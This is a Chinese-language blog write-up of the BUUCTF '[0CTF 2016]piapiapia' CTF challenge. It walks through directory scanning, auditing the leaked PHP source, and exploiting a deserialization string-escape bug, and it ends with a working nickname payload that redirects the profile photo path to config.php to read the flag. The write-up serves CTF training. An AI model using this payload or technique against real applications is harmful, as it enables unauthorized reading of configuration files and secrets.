[0CTF 2016]piapiapia

最新推荐文章于 2022-04-11 17:01:59 发布
最新推荐文章于 2022-04-11 17:01:59 发布
阅读量153 收藏
点赞数
分类专栏: BUUCTF刷题记录
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_25500649/article/details/117462503
版权

看到一个登录框,尝试了弱密码爆破,sql注入也想试一下,都没成功,看来需要注册账号,但是页面上没有注册账号的按钮,理论上来讲可以用后台扫描扫一下后天看看有没有其他的页面或者内容的,但是buuctf扫描太快会显示429,不过我们可以猜一下注册页面应该是register.php。打开一看果然有注册页面。

登录成功之后,修改个人信息,可以看到在这里有文件上传选项,想要尝试文件上传获取shell的方式没有成功。上传了一个正常信息之后,

扫描后台可以使用这个命令可以缓解429的情况,这条命令给扫描加了个延时,

dirsearch -u http://03ac7628-2235-4ec1-838d-9ad73597826d.node3.buuoj.cn/ -s 2 -i 200

扫描结果可以看到有备份的源码。

代码审计

我们可以从config.php中找到flag。

<?php
	$config['hostname'] = '127.0.0.1';
	$config['username'] = 'root';
	$config['password'] = '';
	$config['database'] = '';
	$flag = '';
?>

注册和登陆界面没有可以攻击的地方我们的重点还是放在update.php和profile.php上。。

下面时update.php的代码。

<?php
	require_once('class.php');
	if($_SESSION['username'] == null) {
		die('Login First');	
	}
	if($_POST['phone'] && $_POST['email'] && $_POST['nickname'] && $_FILES['photo']) {

		$username = $_SESSION['username'];
		if(!preg_match('/^\d{11}$/', $_POST['phone']))
			die('Invalid phone');

		if(!preg_match('/^[_a-zA-Z0-9]{1,10}@[_a-zA-Z0-9]{1,10}\.[_a-zA-Z0-9]{1,10}$/', $_POST['email']))
			die('Invalid email');
		
		if(preg_match('/[^a-zA-Z0-9_]/', $_POST['nickname']) || strlen($_POST['nickname']) > 10)
			die('Invalid nickname');

		$file = $_FILES['photo'];
		if($file['size'] < 5 or $file['size'] > 1000000)
			die('Photo size error');

		move_uploaded_file($file['tmp_name'], 'upload/' . md5($file['name']));
		$profile['phone'] = $_POST['phone'];
		$profile['email'] = $_POST['email'];
		$profile['nickname'] = $_POST['nickname'];
		$profile['photo'] = 'upload/' . md5($file['name']);

		$user->update_profile($username, serialize($profile));
		echo 'Update Profile Success!<a href="profile.php">Your Profile</a>';
	}
	else {
?>
<!DOCTYPE html>
<html>
<head>
   <title>UPDATE</title>
   <link href="static/bootstrap.min.css" rel="stylesheet">
   <script src="static/jquery.min.js"></script>
   <script src="static/bootstrap.min.js"></script>
</head>
<body>
	<div class="container" style="margin-top:100px">  
		<form action="update.php" method="post" enctype="multipart/form-data" class="well" style="width:220px;margin:0px auto;"> 
			<img src="static/piapiapia.gif" class="img-memeda " style="width:180px;margin:0px auto;">
			<h3>Please Update Your Profile</h3>
			<label>Phone:</label>
			<input type="text" name="phone" style="height:30px"class="span3"/>
			<label>Email:</label>
			<input type="text" name="email" style="height:30px"class="span3"/>
			<label>Nickname:</label>
			<input type="text" name="nickname" style="height:30px" class="span3">
			<label for="file">Photo:</label>
			<input type="file" name="photo" style="height:30px"class="span3"/>
			<button type="submit" class="btn btn-primary">UPDATE</button>
		</form>
	</div>
</body>
</html>
<?php
	}
?>

看代码可以看到我们输入的内容被过滤了一层,其中对nickname的限制还有长度要<10,但是我们传入nickname的内容是一个数组,就可以绕过长度限制。

我们在php的代码看到序列化函数,这里可以尝试反序列化漏洞。

$user->update_profile($username, serialize($profile));

让我们看一下update_profile函数的具体内容。

public function update_profile($username, $new_profile) {
	$username = parent::filter($username);
	$new_profile = parent::filter($new_profile);

	$where = "username = '$username'";
	return parent::update($this->table, 'profile', $new_profile, $where);
}

我们看到最后会调用父类的update方法将内容写入数据库。filter函数就是通过正则表达式过滤用户输入,将非法值替换为hacker。

public function filter($string) {
	$escape = array('\'', '\\\\');
	$escape = '/' . implode('|', $escape) . '/';
	$string = preg_replace($escape, '_', $string);

	$safe = array('select', 'insert', 'update', 'delete', 'where');
	$safe = '/' . implode('|', $safe) . '/i';
	return preg_replace($safe, 'hacker', $string);
}

至此update.php就已经了解清楚了,下面是profile.php的代码。

<?php
	require_once('class.php');
	if($_SESSION['username'] == null) {
		die('Login First');	
	}
	$username = $_SESSION['username'];
	$profile=$user->show_profile($username);
	if($profile  == null) {
		header('Location: update.php');
	}
	else {
		$profile = unserialize($profile);
		$phone = $profile['phone'];
		$email = $profile['email'];
		$nickname = $profile['nickname'];
		$photo = base64_encode(file_get_contents($profile['photo']));
?>
<!DOCTYPE html>
<html>
<head>
   <title>Profile</title>
   <link href="static/bootstrap.min.css" rel="stylesheet">
   <script src="static/jquery.min.js"></script>
   <script src="static/bootstrap.min.js"></script>
</head>
<body>
	<div class="container" style="margin-top:100px">  
		<img src="https://img-blog.csdnimg.cn/2022010704411147136.gif" class="img-memeda " style="width:180px;margin:0px auto;">
		<h3>Hi <?php echo $nickname;?></h3>
		<label>Phone: <?php echo $phone;?></label>
		<label>Email: <?php echo $email;?></label>
	</div>
</body>
</html>
<?php
	}
?>

我们可以看到这里的代码,有反序列化以及文件读取。

flag在config.php中,而且有serialize、unserialize、filter、file_get_contents,这几个关键字组合在一起就是ctf中常见的反序列字符逃逸的常见套路。构造包含config.php的数据,利用字符串逃逸,在profile.php中读取出来。

详细步骤:

注册账户、登陆账户、随意提交一些资料抓包、修改nickname为nickname[],数组绕过长度检测、修改nickname中的内容。

抓包重放,修改nickname为nickname[]

nickname的值为

wherewherewherewherewherewherewherewherewherewherewherewherewherewherewherewherewherewherewherewherewherewherewherewherewherewherewherewherewherewherewherewherewherewhere";}s:5:"photo";s:10:"config.php";}

此时,config.php的内容就把photo的位置顶替了,此时访问profile.php,没有图片,查看图片的值base64解码可以获取到flag。

 

Ushernrt
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
[0CTF 2016]piapiapia(反序列化逃逸)
羽的博客
03-01 3110
通过扫描后台目录获得了源码(www.zip)。解压出来发现出了登录之外还有注册和其他的目录。在config.php中发现了flag变量,看来题目目的是让我们读取config.php了。 我们来看下每个页面: 1 index.php,register.php: 这两个个是登录页面和注册页面,要求我们输入的用户名和密码的长度都在3-16内。 2 class.php: 在class.php中我们发现了过...
[0CTF 2016]piapiapia总结(PHP序列化长度变化导致尾部字符逃逸)
qq_44657899的博客
04-30 1551
这道题感觉很难,要是比赛中出这种题我肯定做不来,所以我耐着性子慢慢分析这道题,最后居然自己做了个七七八八,只剩下一点点就完全做出来了。 下面把我做这道题时的思路一步一步记录下来,希望能够彻底巩固。 一,信息收集 拿到题没有什么思路,先找找线索,从源码和题目里没看到什么提示。 试了试万能密码登录也无果,然后试着扫目录和用burp抓包找提示。 发现有www.zip源码泄露。 二,分析源码 对于代码审...
BUU-0CTFpiapiapia(反序列化字符串逃逸)
unexpectedthing的博客
11-14 2895
前言 考点是反序列化字符串逃逸 wp 首先这个题,一进来就是一个登录平台,就属于一种基本的web网站的搭建,先登录再去后台,一般来说,可以sql注入之类的,但是我们习惯先看F12的源码,然后用御剑和dirsearch工具去扫描后台或者文件的泄露。 发现存在备份文件泄露,www.zip,得到源码 开始代码审计 config.php中发现了flag变量,看来题目目的是让我们读取config.php了。 我们来看下每个页面: index.php <?php require_once('class.php'
php反序列化长度变化尾部字符串逃逸(0CTF-2016-piapiapia)
10-15
在0CTF-2016-piapiapia这个挑战中,问题出在`profile.php`中的`unserialize()`函数。此函数用于将用户从数据库中获取的已序列化的`$profile`字符串反序列化为对象。如果这个字符串的长度可以被攻击者控制,攻击者...
2016华山杯ctf安卓题目
06-17
2016年华山杯ctf安卓题目
CTF Writeups 2016.9.29
09-29
CTF Writeups 2016.9.29
0ctf_2016_warmup
05-17
2016年0ctf的pwn题。
[0ctf2016]piapiapia
ro4lsc的博客
05-07 6941
[0ctf2016]piapiapia(PHP unserialize字符逃逸) 前言 由于自己还没接触过太多这类的题目,所以还是总结网上的WP进行复现,会尽可能写的清晰,那么话不多说,开始淦 首先使用了dirsearch扫了一下目录(网站源码泄漏www.zip) dirsearch -u "http://62bfe127-e775-4795-bf16-8cc039c1e9ab.node3.buu...
web buuctf [0CTF 2016]piapiapia
weixin_44214568的博客
04-11 810
知识点:1.反序列化字符串逃逸 1.开题 2.常规操作,看源码,查看robots.txt,disearch扫描 抓包,用常规的sql注入测试了一下,没啥效果,disearch扫描也结束了,看了下disearch扫描 有文件www.zip,是源码的一个包,下载下来 3.查看源码,没有路由文件,从index.php看,加载了config.php(里面有flag值),profile.php(会话已经加载的情况下读取信息),都看了一下文件,register.php(注册),注册了一个账号试了试,链
ctf piapiapia(反序列化逃逸)解题记录
rt555016的博客
07-28 960
ctf piapiapia(反序列化逃逸)解题记录 前言 出现漏洞的两个重要因素是:1、敏感函数,2、可控参数。 打开url是一个登录界面,而且只有一个登录按钮。由于看到了登录界面而且没有验证码所以第一个想法是尝试弱口令登录,显然不成功,所以在这里来走了弯路。该题首先是需要通过目录扫描得到源码压缩包、注册账户的地址,得到源码后进行代码审计,发现蛛丝马迹,最终通过构造修改用户名的字符串利用反序列化逃逸得到在config.php中的flag 一、使用dirserch目录扫描工具对目标进行目录扫描
BUU刷题之代码审计
夜幕下的灯火阑珊的博客
05-06 624
[极客大挑战 2019]PHP 题目提示备份文件, 使用webscan工具扫描一下备份文件 py -2 main.py -u http://88bf6495-760a-4a63-aec1-7d1a3a9d9d0c.node3.buuoj.cn/ 扫描得到www.zip文件 解压得到index.php文件和class.php <?php include 'class.php'; ...
[0CTF 2016]piapiapia BUUCTF 详细writeup
叶子的Blog
10-13 461
基础知识 php反序列话逃逸原理 解题思路 payload /www.zip 源码泄露,直接可以下载 ​ 打开config.php可以看到可能flag就存放在这里 访问/register.php,随便注册一个账号,然后登陆,发现跳转到了update.php ​ ...
【学习笔记 31】 buu [0CTF 2016]piapiapia
weixin_43553654的博客
07-30 395
0x00 知识点 网站目录的扫描(源码泄露) 代码审计 PHP反序列化字符逃逸 0x01 知识点详解 网站目录扫描工具都是那几种? 答:这里不单单是指常规的御剑,还包括dirsearch,dirb,nikto等工具,一定要多积累一些这样的工具,不然遇到这种同样的源码泄露,或者有robots.txt文件的题都没法下手。 什么是PHP反序列化字符逃逸? 答:这里引用一个大佬的例子,感觉很是清晰明了,之后我也会自己再详细学习。 序列化 <?php $a = array('123', 'abc', '
0CTF-2016-piapiapia(php反序列化长度变化尾部字符串逃逸)
Sea_Sand息禅
07-21 6473
一个很可爱的登录界面: 进行一下目录扫描,发现源码泄露www.zip,把源码给出: index.php <?php require_once('class.php'); if($_SESSION['username']) { header('Location: profile.php'); exit; } if($_POST['username'] && $...
[0CTF 2016]piapiapia WP(详细)
qq_43622442的博客
04-25 4178
[0CTF 2016]piapiapia WP(详细) 1.打开网站,是个登录框,尝试注入无果.....按道理来说就是注入了啊喂 2.玄学时间到:::       目录扫完啥结果没有。在buuctf做题总是这样,御剑线程开1,不管有没有压缩文件,统统扫不到- -但是可以扫出来普通的php文件,dirsearch要加延迟和调线程,不然...
BUUCTF [0CTF 2016] piapiapia
Senimo
01-05 769
BUUCTF [0CTF 2016] piapiapia 考点 php代码审计 反序列化字符串逃逸 启动环境: 首先是个登录框,只有登陆功能,尝试了一波弱密码和万能密码: 猜测可能不是,继续对题目进行信息收集,使用ctf-wscan扫描网站目录: python3 ctf-wscan.py http://xxx.cn/ 得到扫描结果: 查看到其存在注册页面: 访问update.php页面: 需要先进行登陆。 以及其存在源码泄露,下载www.zip到本地: 对源码进行分析,其中static中存
ctf从0到1电子书
最新发布
12-14
CTF从0到1》是一本针对CTF(Capture The Flag)竞赛的电子书,旨在帮助初学者快速入门和提高他们的技能。该书包括了CTF竞赛的基础知识、技巧和策略,并提供了详细的实例和实战练习,帮助读者从零开始逐步建立起...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值